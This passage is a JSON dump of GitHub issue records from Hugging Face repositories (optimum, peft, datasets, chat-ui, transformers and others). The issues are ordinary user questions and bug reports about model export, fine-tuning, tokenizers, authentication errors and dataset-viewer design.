format.\r\n\r\nIs there any way to convert table-transformer (TATR) to ONNX model. Any help would be cherished.\r\nThanks. \n\n### Motivation\n\nMotivation for this is, I am working on developing a light weight table structure recognition model, ONNX model would help me in that regard.\n\n### Your contribution\n\nNone", "url": "https://github.com/huggingface/optimum/issues/1604", "state": "closed", "labels": [ "feature-request", "onnx" ], "created_at": "2023-12-18T07:18:21Z", "updated_at": "2024-02-28T08:52:49Z", "comments": 3, "user": "balajiChundi" }, { "repo": "huggingface/safetensors", "number": 407, "title": "Does safetensors save the model's hierarchical structure? Is it similar to ONNX?", "body": "If safetensors saves the model's hierarchical structure, how can one access this structure? Is it possible to read it directly like with ONNX?Can I directly load a model from safetensors? \r\nIf the hierarchical structure of the model is not preserved, does it mean that the original model must be read from config.json?", "url": "https://github.com/huggingface/safetensors/issues/407", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-17T15:04:55Z", "updated_at": "2024-02-24T01:45:09Z", "comments": 3, "user": "ZDragonX" }, { "repo": "huggingface/datasets", "number": 6507, "title": "where is glue_metric.py> @Frankie123421 what was the resolution to this?", "body": " > @Frankie123421 what was the resolution to this?\r\n\r\nuse glue_metric.py instead of glue.py in load_metric\r\n\r\n_Originally posted by @Frankie123421 in https://github.com/huggingface/datasets/issues/2117#issuecomment-905093763_\r\n ", "url": "https://github.com/huggingface/datasets/issues/6507", "state": "closed", "labels": [], "created_at": "2023-12-17T09:58:25Z", "updated_at": "2023-12-18T11:42:49Z", "user": "Mcccccc1024" }, { "repo": "huggingface/peft", "number": 1278, "title": "How to add trainable parameters? (bugs in 'modules_to_save')", "body": "### System Info\n\nHi,\r\n\r\nHow can I train other weights in the model rather than fix them during lora training?\r\n\r\n\n\n### Who can help?\n\n@BenjaminBossan Hi, I find you are active recently so I @ you here..\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nself.model, self.peft_optimizer, _, self.peft_lr_scheduler = deepspeed.initialize(\r\n config=training_args.deepspeed,\r\n model=model,\r\n model_parameters=optimizers['model_parameters'] if self.training_args.do_train else None,\r\n optimizer=hf_optimizer,\r\n lr_scheduler=hf_lr_scheduler\r\n )\r\n```\r\nI add the parameters I want to train in `hf_optimizer`, but those parameters still do not change\n\n### Expected behavior\n\nthe gradient of those parameters added to `hf_optimizer` should not be None", "url": "https://github.com/huggingface/peft/issues/1278", "state": "closed", "labels": [], "created_at": "2023-12-17T05:34:09Z", "updated_at": "2024-01-29T15:03:39Z", "user": "shawnricecake" }, { "repo": "huggingface/accelerate", "number": 2262, "title": "When I trained with two processes the gradient of the parameters could not be shared and I ended up with two different models. How to solve this problem?", "body": "When I trained with two processes the gradient of the parameters could not be shared and I ended up with two different models. Did anyone meet this problem before? How to solve it?", "url": "https://github.com/huggingface/accelerate/issues/2262", "state": "closed", "labels": [], "created_at": "2023-12-15T13:48:34Z", "updated_at": "2024-06-11T12:26:07Z", "user": "zypsjtu" }, { "repo": "huggingface/datasets", "number": 6501, "title": " OverflowError: value too large to convert to int32_t ", "body": "### Describe the bug\n\n![image](https://github.com/huggingface/datasets/assets/47747764/f58044fb-ddda-48b6-ba68-7bbfef781630)\r\n\n\n### Steps to reproduce the bug\n\njust loading datasets \n\n### Expected behavior\n\nhow can I fix it\n\n### Environment info\n\npip install /mnt/cluster/zhangfan/study_info/LLaMA-Factory/peft-0.6.0-py3-none-any.whl\r\npip install huggingface_hub-0.19.4-py3-none-any.whl tokenizers-0.15.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl transformers-4.36.1-py3-none-any.whl pyarrow_hotfix-0.6-py3-none-any.whl datasets-2.15.0-py3-none-any.whl tyro-0.5.18-py3-none-any.whl trl-0.7.4-py3-none-any.whl\r\n\r\ndone", "url": "https://github.com/huggingface/datasets/issues/6501", "state": "open", "labels": [], "created_at": "2023-12-15T10:10:21Z", "updated_at": "2025-06-27T04:27:14Z", "comments": 1, "user": "zhangfan-algo" }, { "repo": "huggingface/diffusers", "number": 6178, "title": "How to train Stable Diffusion with DDPM?", "body": "I want to train Stable Diffusion with DDPM, but I can't find the code in this project. I found a lot of training code elsewhere on the internet, but most of it is distillation code on pre-trained models, not the original DDPM training code. I also tried to implement the original training code myself, but I couldn't get good results. Could you provide me with the code for this part if it's convenient for you?\r\n", "url": "https://github.com/huggingface/diffusers/issues/6178", "state": "closed", "labels": [], "created_at": "2023-12-15T02:43:07Z", "updated_at": "2023-12-15T02:54:06Z", "user": "MenSanYan" }, { "repo": "huggingface/dataset-viewer", "number": 2208, "title": "Add a collection with datasets infos", "body": "While working on enabling private datasets (#39) under conditions (isPro, isEnterprise), I thought we missed a place where we control the access to the dataset.\r\n\r\nI think the first step in the DAG, instead of dataset-config-names, should be more about the dataset characteristics: if it's private or public, maybe if it's gated (not sure if it's useful info), if the user is pro or if the org is enterprise, if the viewer is disabled through the README (see https://github.com/huggingface/datasets-server/issues/2207), if the dataset is in the block list.\r\n\r\nAll that information could go to a new step called `dataset-status` or something similar.\r\n\r\nThe content could be:\r\n\r\n```json\r\n{\r\n \"dataset\": \"namespace/dataset\",\r\n \"private\": true,\r\n \"proUser\": false,\r\n \"enterpriseOrg\": true,\r\n \"disabledFromReadme\": false,\r\n \"gated\": false,\r\n \"blocked\": false,\r\n}\r\n```\r\n\r\nAnd a second step, called `dataset-enabled`, that would depend on `dataset-status`, and would return:\r\n- 200 `{enabled: true}` if all the conditions are met\r\n- 404 if we don't want to disclose the existence of the dataset, or if it does not exist\r\n- 501 if it's not implemented\r\n- 403? 404? if the dataset viewer is not enabled (private dataset, no pro user/enterprise org)\r\n\r\nThen, the following steps would propagate the error if so, or if 200, will act as currently.\r\n\r\nI think it's clearer to have two different steps: one to collect the data, another one to take a decision on this basis. We could also have everything in one cache entry, but I think the logic for maintenance would be harder (we would have to add info like: is that dataset private, is the user pro, etc. in the error details, or in the content, etc. to be able to check them regularly)", "url": "https://github.com/huggingface/dataset-viewer/issues/2208", "state": "closed", "labels": [ "question", "refactoring / architecture", "P2" ], "created_at": "2023-12-14T13:59:42Z", "updated_at": "2024-01-11T14:30:03Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2207, "title": "Backfill job processes datasets with disabled viewer?", "body": "If I read the code correctly, the backfill cronjob does not check if the dataset viewer is disabled (`viewer: false` in the README).\r\n\r\nIf we want to implement the dataset viewer for private datasets, under conditions (isPro, isEnterprise), we will have to check these conditions before adding jobs.", "url": "https://github.com/huggingface/dataset-viewer/issues/2207", "state": "closed", "labels": [ "bug", "question", "P2" ], "created_at": "2023-12-14T13:01:53Z", "updated_at": "2024-02-06T16:03:10Z", "user": "severo" }, { "repo": "huggingface/huggingface_hub", "number": 1907, "title": "How to fix \"VBox(children=(HTML(value='
corresponding English translation text]. Hence the Amharic alphabets are unseen in Whisper training. \r\nThe dataset I am trying to fine-tune with is [Amharic audio -> corresponding text in Amharic characters]. It consists of 92.28 hours (32901 instances) for training and 9.12 hours (3139 instances) for the testing set. \r\nMy data sources are: \r\n1. https://github.com/getalp/ALFFA_PUBLIC/tree/master/ASR/AMHARIC and \r\n2. https://www.findke.ovgu.de/findke/en/Research/Data+Sets/Amharic+Speech+Corpus.html\r\n\r\nI tried the tiny, base, and small model sizes. In my first run with whisper-small, I observed a bad performance but when tried to play around with some parameters, including the model size, I was unable to run the code even.\r\nI am not quite sure how to introduce the Amharic language characters other than giving the corresponding text as I have seen in the Hindi example.\r\nI would appreciate your comment regarding the language whose characters were not seen in the Whisper training because it was treated as a speech translation only.\r\nThank you!", "url": "https://github.com/huggingface/blog/issues/1702", "state": "open", "labels": [], "created_at": "2023-12-13T02:47:31Z", "updated_at": "2024-10-02T02:16:12Z", "user": "mequanent" }, { "repo": "huggingface/chat-ui", "number": 629, "title": "Unable to use Azure AD for OpenID signin", "body": "Azure AD does not return the `picture` claim for the `profile` scope which results in a Zod validation error and authentication failing with `HTTP 500`:\r\n\r\n```\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ZodError: [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"code\": \"invalid_type\",\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"expected\": \"string\",\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"received\": \"undefined\",\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"path\": [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"picture\"\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"message\": \"Required\"\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ]\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at get error [as error] (file:///app/node_modules/zod/lib/index.mjs:538:31)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at ZodEffects.parse (file:///app/node_modules/zod/lib/index.mjs:638:22)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at updateUser (file:///app/build/server/chunks/7-74fde01e.js:34:6)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at load (file:///app/build/server/chunks/7-74fde01e.js:126:9)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at async load_server_data (file:///app/build/server/index.js:1932:18)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at async file:///app/build/server/index.js:3303:18 {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | issues: [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | code: 'invalid_type',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | expected: 'string',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | received: 'undefined',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | path: [Array],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | message: 'Required'\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | addIssue: [Function (anonymous)],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | addIssues: [Function (anonymous)],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | errors: [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | code: 'invalid_type',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | expected: 'string',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | received: 'undefined',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | path: [Array],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | message: 'Required'\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ]\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/629", "state": "closed", "labels": [ "support" ], "created_at": "2023-12-12T21:22:19Z", "updated_at": "2024-02-19T09:39:51Z", "comments": 8, "user": "zacps" }, { "repo": "huggingface/chat-ui", "number": 628, "title": "isModelsModalOpen is not defined in ChatIntroduction.svelte probably after recent update ?", "body": "Hi getting this error after updating to the latest version :\r\n\r\nAm Running :\r\n{\r\n 'chat-ui': '0.6.0',\r\n npm: '10.2.4',\r\n node: '21.3.0',\r\n acorn: '8.11.2',\r\n ada: '2.7.4',\r\n ares: '1.20.1',\r\n base64: '0.5.1',\r\n brotli: '1.0.9',\r\n cjs_module_lexer: '1.2.2',\r\n cldr: '44.0',\r\n icu: '74.1',\r\n llhttp: '9.1.3',\r\n modules: '120',\r\n napi: '9',\r\n nghttp2: '1.58.0',\r\n nghttp3: '0.7.0',\r\n ngtcp2: '0.8.1',\r\n openssl: '3.0.12+quic',\r\n simdutf: '4.0.4',\r\n tz: '2023c',\r\n undici: '5.27.2',\r\n unicode: '15.1',\r\n uv: '1.46.0',\r\n uvwasi: '0.0.19',\r\n v8: '11.8.172.17-node.17',\r\n zlib: '1.2.13.1-motley-5daffc7'\r\n}\r\n```\r\n\r\n> chat-ui@0.6.0 dev\r\n> vite dev\r\n\r\n\r\n\r\n VITE v4.3.9 ready in 1206 ms\r\n\r\n \u279c Local: http://localhost:5173/\r\n \u279c Network: use --host to expose\r\n(node:1526125) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.\r\n(Use `node --trace-deprecation ...` to show where the warning was created)\r\n12:13:23 AM [vite-plugin-svelte] /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:53:7 'isModelsModalOpen' is not defined\r\n12:13:23 AM [vite-plugin-svelte] /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:54:53 'isModelsModalOpen' is not defined\r\n12:13:23 AM [vite-plugin-svelte] /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:64:22 'isModelsModalOpen' is not defined\r\nReferenceError: isModelsModalOpen is not defined\r\n at /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:61:8\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at eval (/home/user/public_html/chatui3/src/lib/components/chat/ChatMessages.svelte:75:99)\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at eval (/home/user/public_html/chatui3/src/lib/components/chat/ChatWindow.svelte:116:102)\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at /home/user/public_html/chatui3/src/routes/+page.svelte:57:25\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at Object.default (/home/user/public_html/chatui3/.svelte-kit/generated/root.svelte:50:42)\r\n at eval (/home/user/public_html/chatui3/src/routes/+layout.svelte:203:39)\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/628", "state": "closed", "labels": [ "support" ], "created_at": "2023-12-12T18:49:31Z", "updated_at": "2023-12-24T07:40:42Z", "comments": 7, "user": "DrShivang" }, { "repo": "huggingface/autotrain-advanced", "number": 389, "title": "How to disable default used --multi_gpu ?", "body": " File \"/app/env/lib/python3.10/site-packages/accelerate/commands/launch.py\", line 822, in _validate_launch_command\r\n raise ValueError(\"You need to use at least 2 processes to use `--multi_gpu`.\")\r\nValueError: You need to use at least 2 processes to use `--multi_gpu`.\r\n\r\nHow to disable this from the default provided params ? \r\n\r\nCan autotrain be used with the free CPU version ?\r\n\r\nthank you", "url": "https://github.com/huggingface/autotrain-advanced/issues/389", "state": "closed", "labels": [], "created_at": "2023-12-12T13:32:03Z", "updated_at": "2023-12-15T09:21:52Z", "user": "FiveTechSoft" }, { "repo": "huggingface/chat-ui", "number": 627, "title": "Rlhf data collection feature ", "body": "Is it possible to add a way to generate multiple drafts for a given input. And then based on what the user picks save that data so that it can be used for rlhf?", "url": "https://github.com/huggingface/chat-ui/issues/627", "state": "open", "labels": [ "enhancement", "front", "back" ], "created_at": "2023-12-12T13:29:06Z", "updated_at": "2023-12-14T08:53:14Z", "comments": 0, "user": "nivibilla" }, { "repo": "huggingface/transformers", "number": 27974, "title": "how to replace the existing token in a tokenizer", "body": "### Feature request\r\n\r\nI have a tokenizer which have lots of preserved tokens like bellow:\r\n```\r\n '': 100,\r\n '': 101,\r\n '': 102,\r\n '': 103,\r\n '': 104,\r\n '': 105,\r\n '': 106,\r\n '': 107,\r\n```\r\nI want to replace the '' with '<|im_start|>' and replace '' with '<|im_end|>'\r\n\r\nwhat I want to get is a tokenizer which can act as below:\r\ntokenizer.encode('<|im_start|>') => 100\r\n\r\n\r\n### Motivation\r\n\r\nI want to replace the '' with '<|im_start|>' and replace '' with '<|im_end|>'\r\n\r\n\r\n### Your contribution\r\n\r\nno", "url": "https://github.com/huggingface/transformers/issues/27974", "state": "closed", "labels": [], "created_at": "2023-12-12T12:59:53Z", "updated_at": "2025-05-05T19:18:29Z", "user": "muziyongshixin" }, { "repo": "huggingface/chat-ui", "number": 623, "title": "ChatUI with Docker - Permissions Issue", "body": "I'm trying to use the ChatUI space with Docker. I have a private, custom model which I've trained. \r\nI want to access it in a private space using Docker ChatUI\r\nI seem to be running into permissions errors. \r\n\r\nThings I've tried:\r\nFollowing the instructions set out here: https://huggingface.co/blog/Llama2-for-non-engineers (I used Llama2 with a custom dataset)\r\nCreating it with / without the MongoDB URI\r\nAdding an existing secret as the HF_TOKEN\r\nCreating a new \"HUGGING_FACE_HUB_TOKEN\" in my settings and in the new space and using that\r\nAddint he new token as a secret in the space where the model was generated\r\nHardcoding the access token in .env.local.template to see if it gives a temp fix (it didn't)\r\nDoes it matter if I don't have a centralised secret that is explicitly named as \"HF_TOKEN\"?\r\n\r\nError:\r\nhuggingface_hub.utils._errors.RepositoryNotFoundError: 401 Client Error. (Request ID: Root=1-6576f9fe-00986ef531649f933739e793;0d286b3c-5e65-45c1-a1f9-7efea56654dd)\r\n\r\nError: DownloadError\r\nRepository Not Found for url: https://huggingface.co/api/models//.\r\nPlease make sure you specified the correct repo_id and repo_type.\r\nIf you are trying to access a private or gated repo, make sure you are authenticated.\r\nInvalid username or password.\r\n\r\n\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused\r\nWarning: Transient problem: connection refused Will retry in 10 seconds. 59 \r\nWarning: retries left.", "url": "https://github.com/huggingface/chat-ui/issues/623", "state": "open", "labels": [ "support" ], "created_at": "2023-12-12T08:10:31Z", "updated_at": "2023-12-28T13:58:22Z", "comments": 1, "user": "aidansys17" }, { "repo": "huggingface/text-generation-inference", "number": 1332, "title": "How can I set log output to local file", "body": "### Feature request\n\nI want to set the TGI log to file instead of stdout.\n\n### Motivation\n\nI want to set the TGI log to file instead of stdout.\n\n### Your contribution\n\nhow can I use params in command of env variables to set log output to file.", "url": "https://github.com/huggingface/text-generation-inference/issues/1332", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-12T07:54:26Z", "updated_at": "2024-01-18T01:46:56Z", "user": "soulseen" }, { "repo": "huggingface/alignment-handbook", "number": 74, "title": "A question about the SFTTrainer (also a theoretical question about SFT in general)", "body": "I have a general question about Supervised Fine Tuning (SFT) for Dialogue applications.\r\n\r\nShould the SFT process use the same LM objective (next-token prediction) that is used in pre-training a language model?\r\n\r\nThe \"Dialogue\" task is predicting \"assistant\" tokens, right? Shouldn't the objective be predicting only those tokens? Is one way to do this is to set labels for only assistant tokens and ignore the labels on others?\r\n\r\nThe SFTTrainer [implementation](https://github.com/huggingface/trl/blob/main/trl/trainer/sft_trainer.py#L381) does not set labels - as far as I understand, this leads to \"labels\" being cloned to \"input_ids\" and shifted right (within transformers code) leading to using \"next-token\" prediction objective.\r\n\r\nMore on a philosophical note - if using the same objective as pre-training for SFT, why shouldn't that be called \"Fine Tuning\" the model (On a dialogue dataset of course) rather than \"Supervised Fine Tuning\". What am I missing? Is there a reference paper that explains this well? The right approach to do SFT for Dialogue applications?\r\n\r\nIt is not obvious hence the question. For example, the [InstructGPT](https://arxiv.org/abs/2203.02155) paper mentions SFT but mainly redirects to the (seemingly) first attempt at SFT in [this](https://arxiv.org/pdf/2109.10862.pdf) paper which talks about a \"Summarization\" task but not a \"Dialogue\" task.\r\n\r\nIn that paper, when human labelers are asked to summarize and then when the paper mentions \"Behavioral Cloning\" is used to finetune the LLM to adapt to this task, I'd imagine that only \"Summary\" section is considered label but not the entire prompt/document. Following that principle, for \"Dialogue\" tasks, intuitively, I'd imagine that only \"assistant\" turns should be part of labels.\r\n\r\n(By the way I already asked [this](https://github.com/huggingface/trl/issues/1083) in trl repository as well but not sure which is the best repository to ask the question (this repository is for alignment tasks in which SFT is a step - hence posted here too).", "url": "https://github.com/huggingface/alignment-handbook/issues/74", "state": "open", "labels": [], "created_at": "2023-12-12T06:54:02Z", "updated_at": "2024-01-22T14:34:15Z", "comments": 3, "user": "PradeepKadubandi" }, { "repo": "huggingface/transformers.js", "number": 453, "title": "Summarization Parameters not working", "body": "### Question\n\nI've tried several of the supported summarization models with the code used in the browser extension example.\r\n\r\nThe only one I get any results from in a reasonable time is t5-small.\r\n\r\nMy problem with it is that despite any parameters I try to pass in the result is always same length.\r\n\r\nI've traced through the code and it appears that the config params get passed in.\r\n\r\nI've tried max_new_tokens, min_new_tokens, max_length, no joy.\r\n\r\nI initially started specifying 2.5.3 and last tried just letting cdn handle it, looks like 2.10.x, no joy, same thing.\r\n\r\nCould someone please provide me with an example of getting, in my case, the t5-small model running a summarization task that implements parameters as to output?", "url": "https://github.com/huggingface/transformers.js/issues/453", "state": "open", "labels": [ "question" ], "created_at": "2023-12-12T06:21:52Z", "updated_at": "2023-12-19T21:52:32Z", "user": "kwlayman" }, { "repo": "huggingface/safetensors", "number": 400, "title": "torch.nn.Module named_parameters() seem to be failing for safetensors ", "body": "### System Info\n\nsafetensors==0.4.1\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\nNoticed this issue with the new Mixtral model\r\n\r\nhttps://github.com/vllm-project/vllm/issues/2020\r\n\r\nIs there any way to fix this with safetensors?\n\n### Expected behavior\n\nLoad the mixtral model in safe tensor format", "url": "https://github.com/huggingface/safetensors/issues/400", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-11T18:54:06Z", "updated_at": "2024-01-17T01:48:50Z", "comments": 1, "user": "0-hero" }, { "repo": "huggingface/optimum", "number": 1583, "title": "Add support for Chatglm2 & qwen onnx models", "body": "### Feature request\n\nNeed to export ChatGLM2 & Qwen models to onnx using hf optimum.\r\n\r\nChatGLM2: model-card-> [https://huggingface.co/THUDM/chatglm2-6b](https://github.com/huggingface/optimum/issues/url)\r\nQwen: model-card-> [https://huggingface.co/Qwen/Qwen-7B-Chat](https://github.com/huggingface/optimum/issues/url)\n\n### Motivation\n\nI would like to make the process of exporting llm models to onnx simpler. There should be a generic boilerplate code which can export the models to onnx by simply passing hugging_face model_id.\n\n### Your contribution\n\nI have this piece of code for the export: I'm using this code to export chatglm2: [https://gist.github.com/manishghop/9be5aee6ed3d7551c751cc5d9f7eb8c3](https://github.com/huggingface/optimum/issues/url)\r\ni use it for both chatglm2 & qwen by simply updating model_id.\r\n\r\nIs there a way to run the inference of these onnx models?\r\n", "url": "https://github.com/huggingface/optimum/issues/1583", "state": "closed", "labels": [], "created_at": "2023-12-11T15:22:59Z", "updated_at": "2024-04-24T10:21:48Z", "comments": 4, "user": "manishghop" }, { "repo": "huggingface/peft", "number": 1247, "title": "How to save parameters in prompt_encoder layers in p-tuning?", "body": "I want to resume training from checkpoint in p-tuning, but the model only save parameters in prompt_embeddings.\r\n\"image\"\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/1247", "state": "closed", "labels": [], "created_at": "2023-12-11T02:44:59Z", "updated_at": "2024-01-19T15:03:32Z", "user": "lyt719" }, { "repo": "huggingface/optimum-benchmark", "number": 102, "title": "How to evaluate a model that already exists locally and hasn't been uploaded yet, \"model=?\"", "body": "![\u5fae\u4fe1\u622a\u56fe_20231211144439](https://github.com/huggingface/optimum-benchmark/assets/89191003/51008a5a-ddf0-420e-a355-d9170ffb7dd6)\r\ni really want to know how to load qwen model, thank you very much", "url": "https://github.com/huggingface/optimum-benchmark/issues/102", "state": "closed", "labels": [], "created_at": "2023-12-10T08:35:59Z", "updated_at": "2024-01-11T08:18:17Z", "user": "WCSY-YG" }, { "repo": "huggingface/transformers", "number": 27928, "title": "[Question] What is the main difference between \"AutoModelForCasualLM\" and \"PeftModelForCausalLM\"?", "body": "I also wrote it down in peft repo. However this issue is also related to transformers. So i write my question here again.\r\nissue is here in peft(https://github.com/huggingface/peft/issues/1245)\r\n\r\nHello, Sorry for naive question.\r\nI noticed that the``model.generate()`` function performed differently when inferrence right after train with ```trainer.model``` and after merge and unload. (Every params are the same.)\r\nSo I checked two different object with simple print function.\r\nDifference was the object that contains model.\r\n\r\n1. ```model = trainer.model```\r\n```\r\nPeftModelForCausalLM(\r\n (base_model): LoraModel(\r\n (model): LlamaForCausalLM(\r\n (model): LlamaModel(\r\n (embed_tokens): ModulesToSaveWrapper(\r\n (original_module): Embedding(32008, 5120)\r\n (modules_to_save): ModuleDict(\r\n (default): Embedding(32008, 5120)\r\n )\r\n )\r\n (layers): ModuleList(\r\n (0-39): 40 x LlamaDecoderLayer(\r\n (self_attn): LlamaAttention(\r\n (q_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (k_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (v_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (o_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (rotary_emb): LlamaRotaryEmbedding()\r\n )\r\n (mlp): LlamaMLP(\r\n (gate_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=13824, bias=False)\r\n )\r\n (up_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=13824, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(i", "url": "https://github.com/huggingface/transformers/issues/27928", "state": "closed", "labels": [], "created_at": "2023-12-10T03:10:36Z", "updated_at": "2024-02-01T00:49:07Z", "user": "daehuikim" }, { "repo": "huggingface/peft", "number": 1245, "title": "[Question] What is the main difference between \"AutoModelForCasualLM\" and \"PeftModelForCausalLM\"?", "body": "Because This is is related to \"transformers\". Therefore I wrote this question in transformers repo either.\r\nissue is here in transformers(https://github.com/huggingface/transformers/issues/27928)\r\n\r\nHello, Sorry for naive question.\r\nI noticed that the``model.generate()`` function performed differently when inferrence right after train with ```trainer.model``` and after merge and unload. (Every params are the same.)\r\nSo I checked two different object with simple print function.\r\nDifference was the object that contains model.\r\n\r\n1. ```model = trainer.model```\r\n```\r\nPeftModelForCausalLM(\r\n (base_model): LoraModel(\r\n (model): LlamaForCausalLM(\r\n (model): LlamaModel(\r\n (embed_tokens): ModulesToSaveWrapper(\r\n (original_module): Embedding(32008, 5120)\r\n (modules_to_save): ModuleDict(\r\n (default): Embedding(32008, 5120)\r\n )\r\n )\r\n (layers): ModuleList(\r\n (0-39): 40 x LlamaDecoderLayer(\r\n (self_attn): LlamaAttention(\r\n (q_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n (lora_A): ModuleDict(\r\n (default): Linear(in_features=5120, out_features=64, bias=False)\r\n )\r\n (lora_B): ModuleDict(\r\n (default): Linear(in_features=64, out_features=5120, bias=False)\r\n )\r\n (lora_embedding_A): ParameterDict()\r\n (lora_embedding_B): ParameterDict()\r\n (base_layer): Linear4bit(in_features=5120, out_features=5120, bias=False)\r\n )\r\n (k_proj): Linear4bit(\r\n (lora_dropout): ModuleDict(\r\n (default): Dropout(p=0.1, inplace=False)\r\n )\r\n 